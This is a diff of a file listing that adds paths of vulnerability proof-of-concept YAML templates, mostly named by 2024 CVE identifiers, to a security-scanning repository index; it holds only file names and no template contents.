@@ -47105,6 +47232,7 @@ ./poc/cve/CVE-2024-50422-f497bcd2465c4c2503bbf561d398447b.yaml ./poc/cve/CVE-2024-50422.yaml ./poc/cve/CVE-2024-50423-e7e041c790fe504684de2e185f30a8e2.yaml +./poc/cve/CVE-2024-50423.yaml ./poc/cve/CVE-2024-50424-06ff55d982c5f886718e08cf1a5763f8.yaml ./poc/cve/CVE-2024-50424.yaml ./poc/cve/CVE-2024-50425-4420930ca185bc7638b4b6604241c969.yaml @@ -47258,17 +47386,29 @@ ./poc/cve/CVE-2024-50502-f025837a07fccc883502f1b0b0b998e4.yaml ./poc/cve/CVE-2024-50502.yaml ./poc/cve/CVE-2024-50504-dd2a52c91cedd2c370ed91df355bfdba.yaml +./poc/cve/CVE-2024-50504.yaml ./poc/cve/CVE-2024-50506-4d3cb42ced965efd1907b845f06c8f7d.yaml +./poc/cve/CVE-2024-50506.yaml ./poc/cve/CVE-2024-50507-51ddef91051431f4533a4f6a3fe8afd5.yaml +./poc/cve/CVE-2024-50507.yaml ./poc/cve/CVE-2024-50508-ce09f3e88a290df0e82d6f222274970f.yaml +./poc/cve/CVE-2024-50508.yaml ./poc/cve/CVE-2024-50509-629fe701bf3b8fa380113ae2d245568b.yaml +./poc/cve/CVE-2024-50509.yaml ./poc/cve/CVE-2024-50510-0f258545969915717983830459c9be02.yaml +./poc/cve/CVE-2024-50510.yaml ./poc/cve/CVE-2024-50511-29b214c219866f7f2500c02f16eae355.yaml +./poc/cve/CVE-2024-50511.yaml ./poc/cve/CVE-2024-50512-237b303d56b5af70349547129fcdbed3.yaml +./poc/cve/CVE-2024-50512.yaml ./poc/cve/CVE-2024-50513-9a78c086e5a8808800a944063382e7fe.yaml +./poc/cve/CVE-2024-50513.yaml ./poc/cve/CVE-2024-50514-accc68ef1929a7b2329c8ddb3987dcea.yaml +./poc/cve/CVE-2024-50514.yaml ./poc/cve/CVE-2024-50515-926c437f547ae6645dfe09ee30b6a14a.yaml +./poc/cve/CVE-2024-50515.yaml ./poc/cve/CVE-2024-50516-8a347587322ab61994f1c313f3ae4f6a.yaml +./poc/cve/CVE-2024-50516.yaml ./poc/cve/CVE-2024-50517-485094556c9e611d17c5184a72b60203.yaml ./poc/cve/CVE-2024-50517.yaml ./poc/cve/CVE-2024-50518-d6672a98af1090cdb4f43557f75cece2.yaml 
@@ -47339,6 +47479,7 @@ ./poc/cve/CVE-2024-50549-2d4e523848613f5dd79ab42485e6bb62.yaml ./poc/cve/CVE-2024-50549.yaml ./poc/cve/CVE-2024-50550-9294cd7dd32b1b6c4c7413876be90f29.yaml +./poc/cve/CVE-2024-50550.yaml ./poc/cve/CVE-2024-50551-70fff09e783977976394d8b5aa716e2c.yaml ./poc/cve/CVE-2024-50551.yaml ./poc/cve/CVE-2024-50552-110a4d935bb69b2e995e609bc6a2545d.yaml @@ -47508,6 +47649,7 @@ ./poc/cve/CVE-2024-51614-b3ae60217b15a5836c272790b0aa96be.yaml ./poc/cve/CVE-2024-51614.yaml ./poc/cve/CVE-2024-51615-472c74f38292481e3ef2df3b338ae9c4.yaml +./poc/cve/CVE-2024-51615.yaml ./poc/cve/CVE-2024-51616-ff2a503ee0970c948661ddcf7c43e4c1.yaml ./poc/cve/CVE-2024-51616.yaml ./poc/cve/CVE-2024-51617-7de904c99681c9b7e904df9fb94224bf.yaml @@ -47570,6 +47712,7 @@ ./poc/cve/CVE-2024-51645-2b531680ca59edbf0426f38d3d15a463.yaml ./poc/cve/CVE-2024-51645.yaml ./poc/cve/CVE-2024-51647-ad264e127abeca56e70808ef8908f3d5.yaml +./poc/cve/CVE-2024-51647.yaml ./poc/cve/CVE-2024-51648-0852ef395ba5917cb7109cf04ec0da08.yaml ./poc/cve/CVE-2024-51648.yaml ./poc/cve/CVE-2024-51649-bd32a6ffb76c36b23cc7636ba90e15e6.yaml @@ -47765,6 +47908,7 @@ ./poc/cve/CVE-2024-51791-52563af3c1447f632e60abe9f8872a81.yaml ./poc/cve/CVE-2024-51791.yaml ./poc/cve/CVE-2024-51792-bdfb574c36a41e7d922169660919a6d7.yaml +./poc/cve/CVE-2024-51792.yaml ./poc/cve/CVE-2024-51793-4d175c673b163520eb02bd9ac6b70380.yaml ./poc/cve/CVE-2024-51793-fb5dcea43e6538519aa5caa638ac7aa9.yaml ./poc/cve/CVE-2024-51793.yaml @@ -47811,6 +47955,7 @@ ./poc/cve/CVE-2024-51814-c9d1de6f4895b6765e1577177716171e.yaml ./poc/cve/CVE-2024-51814.yaml ./poc/cve/CVE-2024-51815-2050eb9a873e413f9671599898c2d828.yaml +./poc/cve/CVE-2024-51815.yaml ./poc/cve/CVE-2024-51816-bdee10c167d3a9876a83e9819552c55d.yaml ./poc/cve/CVE-2024-51816.yaml ./poc/cve/CVE-2024-51817-800a57a7c15f38c5b4d57fdbd0cc8d07.yaml 
@@ -48467,6 +48612,7 @@ ./poc/cve/CVE-2024-5327-c9ec3faf7380d55c4bb32eeaa8c62803.yaml ./poc/cve/CVE-2024-5327.yaml ./poc/cve/CVE-2024-53278-e787634bec31d7c19793015e1c4a9a1d.yaml +./poc/cve/CVE-2024-53278.yaml ./poc/cve/CVE-2024-5329-ca8b7f545093310580c6f20618c4c81f.yaml ./poc/cve/CVE-2024-5329.yaml ./poc/cve/CVE-2024-5330-b9508e5eab17157e42a41b20db729637.yaml @@ -48533,6 +48679,7 @@ ./poc/cve/CVE-2024-53724-7483242caf2fe1c9f9bd41336ff2129e.yaml ./poc/cve/CVE-2024-53724.yaml ./poc/cve/CVE-2024-53725-b1549800e4f49f80a8abddc499383424.yaml +./poc/cve/CVE-2024-53725.yaml ./poc/cve/CVE-2024-53726-1e919e9d2a69b020a76e46d4db30570d.yaml ./poc/cve/CVE-2024-53726.yaml ./poc/cve/CVE-2024-53727-1a09bfee59bca7ef7cc5c6492d37fc10.yaml @@ -48540,6 +48687,7 @@ ./poc/cve/CVE-2024-53728-6b8b9000b4c661aae9619e96433dfe52.yaml ./poc/cve/CVE-2024-53728.yaml ./poc/cve/CVE-2024-53729-792d23502d5d4d568b4da98319a2bf83.yaml +./poc/cve/CVE-2024-53729.yaml ./poc/cve/CVE-2024-53730-ac59c1fffc1a30acb03cbc337b1c214f.yaml ./poc/cve/CVE-2024-53730.yaml ./poc/cve/CVE-2024-53731-635558162ad1807994ca63c7d8601caa.yaml @@ -48555,8 +48703,11 @@ ./poc/cve/CVE-2024-53736-9a7ae43cdef5a228c03407f042bfbc83.yaml ./poc/cve/CVE-2024-53736.yaml ./poc/cve/CVE-2024-53737-d75fb3be3b1507d8a5102b9146c5ac69.yaml +./poc/cve/CVE-2024-53737.yaml ./poc/cve/CVE-2024-53738-f9b4da473884d91136fd1add1208b51e.yaml +./poc/cve/CVE-2024-53738.yaml ./poc/cve/CVE-2024-53739-245349b994f894d211d92e07e7132e02.yaml +./poc/cve/CVE-2024-53739.yaml ./poc/cve/CVE-2024-53740-3512f8e780249684a6674da83d240a21.yaml ./poc/cve/CVE-2024-53740.yaml ./poc/cve/CVE-2024-53741-3c0e15ff482eacb374486d199d05d15e.yaml 
@@ -48684,12 +48835,17 @@ ./poc/cve/CVE-2024-53802-b9538c1dec1563ac5f19162fdf0a385a.yaml ./poc/cve/CVE-2024-53802.yaml ./poc/cve/CVE-2024-53803-7c065e8dc8daf36d5150824cdcc9233f.yaml +./poc/cve/CVE-2024-53803.yaml ./poc/cve/CVE-2024-53804-7f7eb1b52516912e3dcbd3b07c0abf16.yaml +./poc/cve/CVE-2024-53804.yaml ./poc/cve/CVE-2024-53805-36ba7e73c93e1a24c1943bbb34e10a80.yaml +./poc/cve/CVE-2024-53805.yaml ./poc/cve/CVE-2024-53806-f5764f3e7c8f3e4b994ffc48ac3274b3.yaml ./poc/cve/CVE-2024-53806.yaml ./poc/cve/CVE-2024-53807-b4800b9f2218096c453e2fb7ff8deaba.yaml +./poc/cve/CVE-2024-53807.yaml ./poc/cve/CVE-2024-53808-734202edafa17e1da99062a92085d7fe.yaml +./poc/cve/CVE-2024-53808.yaml ./poc/cve/CVE-2024-53809-7c3d56c1ef81fd38247e7aceb4ce9335.yaml ./poc/cve/CVE-2024-53809.yaml ./poc/cve/CVE-2024-53810-05164515cb442904515213b867dfadbe.yaml @@ -48697,16 +48853,21 @@ ./poc/cve/CVE-2024-53811-693bd83477fd87295db6144403ba95fc.yaml ./poc/cve/CVE-2024-53811.yaml ./poc/cve/CVE-2024-53812-f7722f28837f9ffee33d0d19cbdc6579.yaml +./poc/cve/CVE-2024-53812.yaml ./poc/cve/CVE-2024-53813-c4bb899ff6e3559fc995d6f8107e8fa5.yaml ./poc/cve/CVE-2024-53813.yaml ./poc/cve/CVE-2024-53814-45badbf9bef37dbf159a0f6bdbb33fac.yaml ./poc/cve/CVE-2024-53814.yaml ./poc/cve/CVE-2024-53815-2e40699b6c5f7ad5936edd6b07104f72.yaml +./poc/cve/CVE-2024-53815.yaml ./poc/cve/CVE-2024-53816-5bf76a83c973cc1ae3f76d3a4e284aef.yaml ./poc/cve/CVE-2024-53816.yaml ./poc/cve/CVE-2024-53817-c6b5a8cf44ad040cab396afbb639a133.yaml +./poc/cve/CVE-2024-53817.yaml ./poc/cve/CVE-2024-53818-7859a96404bfca0d2fce23fb1104c8ba.yaml +./poc/cve/CVE-2024-53818.yaml ./poc/cve/CVE-2024-53819-ed57d3a9059f066ad18459455b0d7bd1.yaml +./poc/cve/CVE-2024-53819.yaml ./poc/cve/CVE-2024-5382-3f1ae151e74bf3a85689b92b47a722f8.yaml ./poc/cve/CVE-2024-5382.yaml ./poc/cve/CVE-2024-53820-d29687c5b1248e1eb95b29312a0b01b3.yaml 
@@ -48716,10 +48877,13 @@ ./poc/cve/CVE-2024-53822-e7eb2dbf72bf2a9d2a5f203cb29bb977.yaml ./poc/cve/CVE-2024-53822.yaml ./poc/cve/CVE-2024-53823-ec6e0f4eab04b9728e4dde6ee13b9ace.yaml +./poc/cve/CVE-2024-53823.yaml ./poc/cve/CVE-2024-53824-6175e1733e3397fffa8fe7b047e94e55.yaml +./poc/cve/CVE-2024-53824.yaml ./poc/cve/CVE-2024-53825-e050ec243fb6a9bd4ea08e3ffba5ac38.yaml ./poc/cve/CVE-2024-53825.yaml ./poc/cve/CVE-2024-53826-e1607a5c14986b3d990b221c0149561b.yaml +./poc/cve/CVE-2024-53826.yaml ./poc/cve/CVE-2024-5416-b035cee38aeca20c0511efbe55146c96.yaml ./poc/cve/CVE-2024-5416.yaml ./poc/cve/CVE-2024-5418-434a339fc4d8515bf3d8877608840f7e.yaml @@ -48729,7 +48893,9 @@ ./poc/cve/CVE-2024-54205-8c6843e98b7d35de1333ebd6a9cc4108.yaml ./poc/cve/CVE-2024-54205.yaml ./poc/cve/CVE-2024-54206-d592b86b797429244811af87aadde053.yaml +./poc/cve/CVE-2024-54206.yaml ./poc/cve/CVE-2024-54207-6550e248932e2b5e412bf4389b4db0b2.yaml +./poc/cve/CVE-2024-54207.yaml ./poc/cve/CVE-2024-54208-69923a63f86a99149e7d69a9950e6d76.yaml ./poc/cve/CVE-2024-54208.yaml ./poc/cve/CVE-2024-54209-a394776dfd7d69b7f47439e6bf38192b.yaml 
@@ -48739,36 +48905,61 @@ ./poc/cve/CVE-2024-54211-eed93c53b719da64f5f167a3624cd5f6.yaml ./poc/cve/CVE-2024-54211.yaml ./poc/cve/CVE-2024-54212-d09821a4422849355cacdfed1659a677.yaml +./poc/cve/CVE-2024-54212.yaml ./poc/cve/CVE-2024-54213-c849bc6412851fdfab9fa6a72e7286ff.yaml +./poc/cve/CVE-2024-54213.yaml ./poc/cve/CVE-2024-54214-62204c0e75824c81aacf42c7b2c3ef67.yaml +./poc/cve/CVE-2024-54214.yaml ./poc/cve/CVE-2024-54215-eb6c568774fac21c9e0fd876c8c18c48.yaml +./poc/cve/CVE-2024-54215.yaml ./poc/cve/CVE-2024-54216-5024750a9504fe312f75e6f67ba9c71d.yaml +./poc/cve/CVE-2024-54216.yaml ./poc/cve/CVE-2024-54217-313ad197c9d2d51af932f72d31a189fa.yaml +./poc/cve/CVE-2024-54217.yaml ./poc/cve/CVE-2024-54218-06b4afe7f8ad8e989e59bbb3cdd989da.yaml +./poc/cve/CVE-2024-54218.yaml ./poc/cve/CVE-2024-54219-0c95674ba25b17f5866c5401fb53b69f.yaml +./poc/cve/CVE-2024-54219.yaml ./poc/cve/CVE-2024-54220-dabc3c346f24f802d453a828795d331c.yaml +./poc/cve/CVE-2024-54220.yaml ./poc/cve/CVE-2024-54221-6ec2fd6753d862f4960591e64ef3b6c9.yaml +./poc/cve/CVE-2024-54221.yaml ./poc/cve/CVE-2024-54223-eb5a3cfa0572e6123bd603f96e9d1ae5.yaml +./poc/cve/CVE-2024-54223.yaml ./poc/cve/CVE-2024-54224-633e8c33e4210ddd571311b75b795b03.yaml +./poc/cve/CVE-2024-54224.yaml ./poc/cve/CVE-2024-54225-865cf12d67ad4e2a12b4e760865df92d.yaml +./poc/cve/CVE-2024-54225.yaml ./poc/cve/CVE-2024-54226-c4753fa19fce4c8a27345324e7b382cb.yaml +./poc/cve/CVE-2024-54226.yaml ./poc/cve/CVE-2024-54227-43c41feaa9d58f8efc0b1ce3261306a2.yaml +./poc/cve/CVE-2024-54227.yaml ./poc/cve/CVE-2024-54228-d3544c5336366a751ac82c436ef933e3.yaml +./poc/cve/CVE-2024-54228.yaml ./poc/cve/CVE-2024-54230-421f5bcea4b13be62429fcb8ab498858.yaml +./poc/cve/CVE-2024-54230.yaml ./poc/cve/CVE-2024-54231-427de4f60398b7e1078355b6618fa118.yaml +./poc/cve/CVE-2024-54231.yaml ./poc/cve/CVE-2024-54232-43abed5835eaafea250948b708d95e51.yaml +./poc/cve/CVE-2024-54232.yaml ./poc/cve/CVE-2024-5424-df160c9df5b615381a764753829b3ffb.yaml ./poc/cve/CVE-2024-5424.yaml 
./poc/cve/CVE-2024-54247-32dd452fd1db8cb528bb367644d98408.yaml +./poc/cve/CVE-2024-54247.yaml ./poc/cve/CVE-2024-5425-8573326a950aad533931811dfbdfb643.yaml ./poc/cve/CVE-2024-5425.yaml ./poc/cve/CVE-2024-54250-80229f33352eda0e4db54b51c9f141a7.yaml +./poc/cve/CVE-2024-54250.yaml ./poc/cve/CVE-2024-54251-4675c5cbd2d4490266ac6406a9506a12.yaml +./poc/cve/CVE-2024-54251.yaml ./poc/cve/CVE-2024-54253-b4f4e0a053f49fd713057ccba10c41ab.yaml +./poc/cve/CVE-2024-54253.yaml ./poc/cve/CVE-2024-54255-22f20fe5fd8f58ffc816fe1d69d3dfea.yaml +./poc/cve/CVE-2024-54255.yaml ./poc/cve/CVE-2024-5426-05a62725e997584a7ca96583d0ed07b0.yaml ./poc/cve/CVE-2024-5426.yaml ./poc/cve/CVE-2024-54260-174ca9070168a4655d9261554d70d98e.yaml +./poc/cve/CVE-2024-54260.yaml ./poc/cve/CVE-2024-5427-8e98140a73fa39518f80acb935a5af8c.yaml ./poc/cve/CVE-2024-5427.yaml ./poc/cve/CVE-2024-5429-4e4d745e7910fb2ab893ff12ad5452c1.yaml @@ -50193,6 +50384,7 @@ ./poc/cve/CVE-2024-7963-42883078e2295a44c19c2974ad634068.yaml ./poc/cve/CVE-2024-7963.yaml ./poc/cve/CVE-2024-7982-fc7896dc545f4f6e317ed308a0e8b1e6.yaml +./poc/cve/CVE-2024-7982.yaml ./poc/cve/CVE-2024-7985-53ab665dcdb6d56c0c0d45bebfc0b937.yaml ./poc/cve/CVE-2024-7985.yaml ./poc/cve/CVE-2024-8016-d1bc0d8335eb95e44886878c9717595b.yaml @@ -50263,6 +50455,7 @@ ./poc/cve/CVE-2024-8126-cacfaff114cb1cf655ed1db79dcd7b99.yaml ./poc/cve/CVE-2024-8126.yaml ./poc/cve/CVE-2024-8157-6e2ff7bf6e39d3c1283ab25439378a24.yaml +./poc/cve/CVE-2024-8157.yaml ./poc/cve/CVE-2024-8181.yaml ./poc/cve/CVE-2024-8187-37b7d5f89d1ca080b4cd6f300d397c8c.yaml ./poc/cve/CVE-2024-8187.yaml @@ -50357,6 +50550,7 @@ ./poc/cve/CVE-2024-8369-371892027f1c271d3247dba36b384fb8.yaml ./poc/cve/CVE-2024-8369.yaml ./poc/cve/CVE-2024-8378-74a7d87cee245c48a3bf9a30ec708ca3.yaml +./poc/cve/CVE-2024-8378.yaml ./poc/cve/CVE-2024-8379-4628330a23e614f19a4cee7de7658bb5.yaml ./poc/cve/CVE-2024-8379-fe39d989e4d132f5087243fbc500f6e9.yaml ./poc/cve/CVE-2024-8379.yaml 
@@ -50391,6 +50585,7 @@ ./poc/cve/CVE-2024-8442-b5cb9608845f018001708aacb476f0cc.yaml ./poc/cve/CVE-2024-8442.yaml ./poc/cve/CVE-2024-8444-6574252782a3a4b5b570683a6ba1f844.yaml +./poc/cve/CVE-2024-8444.yaml ./poc/cve/CVE-2024-8461.yaml ./poc/cve/CVE-2024-8476-2e99a2b661bac0abf052a20c5de25aea.yaml ./poc/cve/CVE-2024-8476.yaml @@ -50495,6 +50690,7 @@ ./poc/cve/CVE-2024-8624-eda2995e49f0eef58ec03aafc81620f7.yaml ./poc/cve/CVE-2024-8624.yaml ./poc/cve/CVE-2024-8625-d78c80da7bee3e0e6c7436c5df622773.yaml +./poc/cve/CVE-2024-8625.yaml ./poc/cve/CVE-2024-8627-5e1dd56a72613db49e7c28fef055a1ae.yaml ./poc/cve/CVE-2024-8627.yaml ./poc/cve/CVE-2024-8628-5dc2473be25badf6894e296c03e2e56a.yaml @@ -50828,6 +51024,7 @@ ./poc/cve/CVE-2024-9109-db046fec044ec68a48276b8ee3af3015.yaml ./poc/cve/CVE-2024-9109.yaml ./poc/cve/CVE-2024-9111-0ab199d09ef9476690f1e53604ee2f5c.yaml +./poc/cve/CVE-2024-9111-581fc93879c1c54ef26503d9dcc6ddcf.yaml ./poc/cve/CVE-2024-9111.yaml ./poc/cve/CVE-2024-9115-07ac47d03400519778a0be24bcd69ac7.yaml ./poc/cve/CVE-2024-9115.yaml @@ -50967,6 +51164,7 @@ ./poc/cve/CVE-2024-9289-ce62b0a9bacb1caa832b04983319ac6e.yaml ./poc/cve/CVE-2024-9289.yaml ./poc/cve/CVE-2024-9290-5dcc80904918d747de269b21d040c79c.yaml +./poc/cve/CVE-2024-9290.yaml ./poc/cve/CVE-2024-9292-19dc703f2b0bc0aa1458f81c299d2b0a.yaml ./poc/cve/CVE-2024-9292.yaml ./poc/cve/CVE-2024-9302-a4e5e1a6797eb0268e9f6e37033f4ea7.yaml 
@@ -51050,11 +51248,13 @@ ./poc/cve/CVE-2024-9421.yaml ./poc/cve/CVE-2024-9422-36832b91d82ec54ad53a0608240202ac.yaml ./poc/cve/CVE-2024-9422-d55541dec5fdad3a0414a578e636b2f1.yaml +./poc/cve/CVE-2024-9422.yaml ./poc/cve/CVE-2024-9425-9969523487d164f3223d1b2ba16294e0.yaml ./poc/cve/CVE-2024-9425.yaml ./poc/cve/CVE-2024-9426-234491a2cee69902e52d1e13b146e157.yaml ./poc/cve/CVE-2024-9426.yaml ./poc/cve/CVE-2024-9428-c09d51632b50b1241638d75cbef69a48.yaml +./poc/cve/CVE-2024-9428.yaml ./poc/cve/CVE-2024-9430-129ad6d61f04e28e61c3cacf74b91e82.yaml ./poc/cve/CVE-2024-9430.yaml ./poc/cve/CVE-2024-9434-a5e01a5e10b9eb2ced5b5a4c37943620.yaml @@ -51189,6 +51389,7 @@ ./poc/cve/CVE-2024-9607-815ef285570b4259ae993f3feefc49d6.yaml ./poc/cve/CVE-2024-9607.yaml ./poc/cve/CVE-2024-9608-43ae0e925e1e1d7237870fbf4dcc9527.yaml +./poc/cve/CVE-2024-9608.yaml ./poc/cve/CVE-2024-9609-2981fd6dfce2190c72de28c2bd4dea23.yaml ./poc/cve/CVE-2024-9609.yaml ./poc/cve/CVE-2024-9610-22573cea45a3c22fba477c8e4bf581f3.yaml @@ -51233,6 +51434,7 @@ ./poc/cve/CVE-2024-9650-b366e98270b7c64939bad3b88fc2f326.yaml ./poc/cve/CVE-2024-9650.yaml ./poc/cve/CVE-2024-9651-22705fcb7e0d7ad90586a2952ccaeadc.yaml +./poc/cve/CVE-2024-9651.yaml ./poc/cve/CVE-2024-9652-44db9961d333aa8937876e8e157f625b.yaml ./poc/cve/CVE-2024-9652.yaml ./poc/cve/CVE-2024-9653-8cc4841842ce3b54e5c10d7d3492eb7e.yaml @@ -51271,6 +51473,7 @@ ./poc/cve/CVE-2024-9694.yaml ./poc/cve/CVE-2024-9696-7eb3ceca660ff8ed51fe8b0a6a2f165c.yaml ./poc/cve/CVE-2024-9696.yaml +./poc/cve/CVE-2024-9698-dbff952933f5639b29a1b80e2c7a52b6.yaml ./poc/cve/CVE-2024-9700-ba9609a222eaa8c29e551df91b2a325f.yaml ./poc/cve/CVE-2024-9700.yaml ./poc/cve/CVE-2024-9703-e13e3ba30616df9b1b2959b3e69d88ea.yaml 
@@ -51288,6 +51491,7 @@ ./poc/cve/CVE-2024-9756-64a408f630e792f3ff717cc9822672de.yaml ./poc/cve/CVE-2024-9756.yaml ./poc/cve/CVE-2024-9768-30f7e3c972d3515da9f5d833ce52d040.yaml +./poc/cve/CVE-2024-9768.yaml ./poc/cve/CVE-2024-9769-04f41ad5af8b4a40298696fa6f430b08.yaml ./poc/cve/CVE-2024-9769.yaml ./poc/cve/CVE-2024-9772-5094698925e989ea36420156bd740e26.yaml @@ -51312,12 +51516,15 @@ ./poc/cve/CVE-2024-9824-44742b5dfe15bf136d8b10c8fdb6d6e7.yaml ./poc/cve/CVE-2024-9824.yaml ./poc/cve/CVE-2024-9828-b109b777c27d6b8c5c2052777f0757de.yaml +./poc/cve/CVE-2024-9828.yaml ./poc/cve/CVE-2024-9829-3798cb15694af364b3770e56eba30498.yaml ./poc/cve/CVE-2024-9829.yaml ./poc/cve/CVE-2024-9830-ba53cc170b6dbd51f1cc76ccfd6109f9.yaml ./poc/cve/CVE-2024-9830.yaml ./poc/cve/CVE-2024-9835-38ca210b0204cafbf6f8c2b60a4a2cb6.yaml +./poc/cve/CVE-2024-9835.yaml ./poc/cve/CVE-2024-9836-30a0c883d6baf4f6567157334592361c.yaml +./poc/cve/CVE-2024-9836.yaml ./poc/cve/CVE-2024-9837-640ab38f88c83ed061eb38b767c65747.yaml ./poc/cve/CVE-2024-9837.yaml ./poc/cve/CVE-2024-9839-959311f6b2914d74ef3d633f67e6519f.yaml @@ -51408,6 +51615,7 @@ ./poc/cve/CVE-2024-9933-e1ec60c544c2e28af5a94072e33b5a84.yaml ./poc/cve/CVE-2024-9933.yaml ./poc/cve/CVE-2024-9934-5ae7ef68155780d5697b9e643131dccb.yaml +./poc/cve/CVE-2024-9934.yaml ./poc/cve/CVE-2024-9935-44469e492e60f8411ffdcda9081fb983.yaml ./poc/cve/CVE-2024-9935-e34f6995a95f33b10c197658639863ad.yaml ./poc/cve/CVE-2024-9935.yaml @@ -58925,6 +59133,7 @@ ./poc/cve/inspur-tscev4-cve-2020-21224-rce.yml ./poc/cve/jboss-cve-2010-1871.yaml ./poc/cve/jboss-cve-2010-1871.yml +./poc/cve/jeecg-boot-getTotalData-sqli-CVE-2024-48307.yaml ./poc/cve/jellyfin-cve-2021-29490.yaml ./poc/cve/jellyfin-cve-2021-29490.yml ./poc/cve/jellyfin-file-read-cve-2021-21402.yaml 
@@ -60426,6 +60635,7 @@ ./poc/detect/adbhoney-honeypot-cnxn-detect.yaml ./poc/detect/adbhoney-honeypot-shell-detect.yaml ./poc/detect/adbuddy-adblocker-detection-3bb46498f1afb79669fda4714744548d.yaml +./poc/detect/adbuddy-adblocker-detection.yaml ./poc/detect/adcs-detect.yaml ./poc/detect/addeventlistener-detect-64.yaml ./poc/detect/addeventlistener-detect-65.yaml @@ -69124,6 +69334,7 @@ ./poc/microsoft/impresscms-detect.yaml ./poc/microsoft/impresscms.yaml ./poc/microsoft/impresspages-cms.yaml +./poc/microsoft/ims-countdown-afc1b693115a4259c31be875ae4878db.yaml ./poc/microsoft/imsanity.yaml ./poc/microsoft/indonasia-toko-cms-sql.yaml ./poc/microsoft/informatics-cms.yaml @@ -70405,6 +70616,7 @@ ./poc/mysql/azure-mysql-db-update-unalerted.yaml ./poc/mysql/azure-nsg-mysql-unrestricted.yaml ./poc/mysql/create-mysql-detection.yaml +./poc/mysql/cyberpanel-upgrademysqlstatus-rce.yaml ./poc/mysql/dionaea-mysql-honeypot-detect.yaml ./poc/mysql/e-cology-e-office-mysql-config-leak.yaml ./poc/mysql/ecology-mysql-config.yaml @@ -83329,6 +83541,7 @@ ./poc/other/Alibaba-Anyproxy-fileRead.yaml ./poc/other/AllInOne-2-6-0-readfile.yaml ./poc/other/Anni-fileDownload.yaml +./poc/other/AnyShare-Usrm_GetAllUsers-infoleak.yaml ./poc/other/AolynkBR304-weakPass.yaml ./poc/other/Apexis-IPCAM-info.yaml ./poc/other/Application_level_dos.yaml @@ -83770,6 +83983,7 @@ ./poc/other/abcapp-creator-0915ccd38e9234bbe108df1946638a13.yaml ./poc/other/abcapp-creator.yaml ./poc/other/abcbiz-addons-f574e93c5fcb8829799acb29890991b0.yaml +./poc/other/abcbiz-addons.yaml ./poc/other/abeta-punchout-ff9293ba28748efa2ab9a2fe77385468.yaml ./poc/other/abeta-punchout.yaml ./poc/other/abitgone-commentsafe-c3a6ddfd689a765dd5c0a9e893fd5e7e.yaml 
@@ -84020,7 +84234,9 @@ ./poc/other/acf-front-end-editor.yaml ./poc/other/acf-frontend-display.yaml ./poc/other/acf-frontend-form-element-02ae74747e9ca4533fa8476aac124374.yaml +./poc/other/acf-frontend-form-element-37cf54b4fd530e8cbe84be3c76ac823a.yaml ./poc/other/acf-frontend-form-element-3c9af9090d7895d467710343e1e58ccb.yaml +./poc/other/acf-frontend-form-element-e002b76cae1c5fe698d73bad818d1658.yaml ./poc/other/acf-frontend-form-element.yaml ./poc/other/acf-image-crop-add-on-48209b6f934c02b05cd32cbf6656419d.yaml ./poc/other/acf-image-crop-add-on.yaml @@ -85009,6 +85225,7 @@ ./poc/other/aidreform.yaml ./poc/other/aim.yaml ./poc/other/aio-contact-9c5a8fce29d8cb65da0f5a5b7cac1f0c.yaml +./poc/other/aio-contact.yaml ./poc/other/aio-time-clock-lite-73fa64b7d4bf28a41fdeb87286cc659c.yaml ./poc/other/aio-time-clock-lite.yaml ./poc/other/aiomatic-automatic-ai-content-writer-b1ccb28c2fa59e7b18e1ffd1e815d9d8.yaml @@ -85286,6 +85503,7 @@ ./poc/other/all-in-one-seo-pack-pro.yaml ./poc/other/all-in-one-seo-pack.yaml ./poc/other/all-in-one-slider-14b7d4b703641121459b5014bbc6bd54.yaml +./poc/other/all-in-one-slider.yaml ./poc/other/all-in-one-video-gallery-6955fa259858f70bcb7e512f050bb08a.yaml ./poc/other/all-in-one-video-gallery-7740c66c87fb2221a145ee3f8964614a.yaml ./poc/other/all-in-one-video-gallery-7cba5cebb250af0c749cada174685613.yaml @@ -85379,6 +85597,7 @@ ./poc/other/alphabetic-pagination-plugin.yaml ./poc/other/alphabetic-pagination.yaml ./poc/other/alphabetical-list-fcb529436e163b55fffdd5d732bd07fe.yaml +./poc/other/alphabetical-list.yaml ./poc/other/alpine-photo-tile-for-pinterest-dd9ae7ae8f1a7115cd8bb588fe7ef45f.yaml ./poc/other/alpine-photo-tile-for-pinterest.yaml ./poc/other/alstom-system.yaml 
@@ -87331,6 +87550,7 @@ ./poc/other/billingtesttool.yaml ./poc/other/bimpos.yaml ./poc/other/bin-binlist.yaml +./poc/other/bin-stripe-donation-a3308f3b5497bd4ba2d82def5ce6916c.yaml ./poc/other/bin-stripe-donation.yaml ./poc/other/bing-site-verification-using-meta-tag-af119b663502cc9c02296feffe9155e5.yaml ./poc/other/bing-site-verification-using-meta-tag.yaml @@ -87471,6 +87691,7 @@ ./poc/other/blixkrieg-f1f43ca41ccf14d8f46bbc8fda17c18c.yaml ./poc/other/blixkrieg.yaml ./poc/other/blizzard-quotes-bde5ee51c28fdec7059f71aa63b9d52f.yaml +./poc/other/blizzard-quotes.yaml ./poc/other/blobinator-320551d2488bf7eded48e3e77110131e.yaml ./poc/other/blobinator-d41d8cd98f00b204e9800998ecf8427e.yaml ./poc/other/blobinator-e3bbf6e55e07e8e4668d4befa641f94d.yaml @@ -87641,6 +87862,7 @@ ./poc/other/boastmachine.yaml ./poc/other/boat-rental-system-5973f7494030485e36522518a1a396d8.yaml ./poc/other/boat-rental-system.yaml +./poc/other/bodi0s-easy-cache-b25e0848713a993a19d7a570188681d3.yaml ./poc/other/bodybuildingcom.yaml ./poc/other/boilerplate-extension-ca6049340d4784eaae739d7b2c4a3496.yaml ./poc/other/boilerplate-extension-d0f6747c9732f64b78471a454da82868.yaml @@ -87799,6 +88021,7 @@ ./poc/other/booking-system-plugin-d41d8cd98f00b204e9800998ecf8427e.yaml ./poc/other/booking-system-plugin.yaml ./poc/other/booking-system-trafft-5c6449fdf82d85068f035ee2f7c81477.yaml +./poc/other/booking-system-trafft.yaml ./poc/other/booking-system.yaml ./poc/other/booking-ultra-pro-028ab0828eac3059bb66ef5a1ce44f09.yaml ./poc/other/booking-ultra-pro-15c156c7e76d4f5a78dada485b004868.yaml 
